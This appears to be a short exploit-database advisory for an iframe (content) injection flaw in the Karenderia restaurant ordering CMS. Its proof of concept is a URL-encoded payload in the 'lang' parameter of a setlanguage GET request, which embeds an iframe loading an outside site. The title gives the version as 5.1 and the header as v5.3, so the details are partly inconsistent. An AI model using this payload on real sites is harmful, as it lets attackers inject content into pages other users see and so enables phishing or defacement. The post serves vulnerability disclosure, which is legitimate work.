Karenderia CMS 5.1 Content Injection

Karenderia CMS version 5.1 suffers from an iframe injection vulnerability.


MD5 | d956a50bf28197d69719e695ccd88bd5

===========================================================================================
# Exploit Title: Karenderia CMS 5.1 - Frame Inj.
# Dork: N/A
# Date: 02-07-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: [email protected]
# Software Link:
https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Version: v5.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Karenderia Multiple Restaurant System is a
restaurant food ordering and restaurant membership system.
===========================================================================================
# POC - Frame Inj
# Parameters : lang
# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org
%2f%3f%22%3e%3c%2fiframe%3e
# GET Method :
http://localhost/kmrs/setlanguage?lang=%3ciframe%20src%3d%22http%3a%2f%2fcyber-warrior.org%2f%3f%22%3e%3c%2fiframe%3e
===========================================================================================

Related Posts